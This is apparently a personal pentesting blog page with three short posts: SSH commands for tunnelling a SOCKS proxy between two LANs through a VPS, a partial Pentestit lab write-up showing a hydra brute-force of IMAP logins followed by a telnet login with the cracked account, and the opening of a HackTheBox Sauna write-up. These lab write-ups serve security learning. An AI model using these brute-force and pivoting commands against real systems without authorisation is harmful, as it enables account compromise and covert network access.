czwartek, 26 marca 2020

SSH socks proxy beetwen Lan1 and Lan2

Linux in Lan1: ssh -R 5555:localhost:22 w4cky@VPS_IP -p 8080
Linux in Lan2: SSH -L 5000:127.0.0.1:5555 w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -D 1234 root@localhost -p 5000

niedziela, 22 marca 2020

Lab Pentestit 14 - writeup

  1. Crack password for mail
# cat logins_mail.txt                                                                                                                        
sidorov@test.lab
ivanov@test.lab 
petrov@test.lab 
support@test.lab


hydra -L logins_mail.txt  -P /tmp/1 imap://192.168.101.14 -t 60 -f  -I                                                                             
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://192.168.101.14:143/


[ERROR] IMAP LOGIN AUTH : 2 NO [AUTHENTICATIONFAILED] Authentication failed.


[143][imap] host: 192.168.101.14   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12


telnet 192.168.101.14 imap                                                         
Connected to 192.168.101.14.
Escape character is '^]'.
*
a1 LOGIN support@test.lab PASSWORD
a1 OK
^]
telnet> quit
Connection closed.




HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All fun is enumeration. Start by enumerating employee accounts. The website turns out to be useful.